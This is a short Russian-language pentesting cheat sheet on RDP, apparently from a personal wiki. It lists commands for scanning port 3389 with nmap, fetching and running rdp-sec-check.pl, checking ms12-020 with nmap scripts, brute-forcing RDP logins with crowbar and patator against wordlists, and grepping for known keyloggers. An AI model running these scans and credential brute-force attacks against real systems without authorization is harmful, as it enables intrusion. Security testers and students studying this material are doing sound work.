Анализ rdp

Анализ rdp

    Найти открытый порт 3389/tcp/udp в сети 10.0.2.0/24
    nmap -p 3389 -sU -sS --open 10.0.2.0/24
    Программа rdp-sec-check.pl

    Выявление уязвимостей RDP удаленного узла:

    sudo cpan install Encoding::BER Ctrl+d wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl chmod +x rdp-sec-check.pl ./rdp-sec-check.pl 10.0.2.115
    Брут-Форс RDP с помощью crowbar

    Crowbar Paramiko1 Paramiko2

    sudo apt install -y nmap openvpn 2-x11 tigervnc-viewer python3 python3-pip git clone https://github.com/galkan/crowbar.git cd crowbar pip install paramiko pip3 install -r requirements.txt ./crowbar.py -b rdp -U user.txt -C passwords.txt -s 10.0.2.115/32
    Patator

    Мощная программа для брут-форса сетевых служб.

    patator rdp_login host=192.168.1.1 user=FILE0 password=FILE1 0=/home/toly/crowbar/user.txt 1=/home/toly/crowbar/passwords.txt -x ignore:fgrep='ERRCONNECT_LOGON_FAILURE'
    nmap

    Проверка на уязвимость с помощью встроенных в nmap скриптов

    sudo nmap -p 3389 -sU -sS -Pn --script rdp-enum-encryption,rdp-vuln-ms12-020 10.0.2.115

    Задействовать все скрипты rdp

    sudo nmap -p 3389 -Pn -sU -sS --script 'rdp-*' 10.0.2.115
    Проверка на наличие известных кейлогеров
    ps -aux | grep -e lkl -e uberkey -e THC-vlogger -e PyKeylogger -e logkeys
    Источники
    Последнее изменение: 10.10.2024 05:11


    Связанные темы
    Здесь пока нет комментариев
    Добавлять комментарии могут только авторизованные пользователи

    Авторизоваться
    Я буду рекламой
    Я тоже буду рекламой
    И я
    ВВЕРХ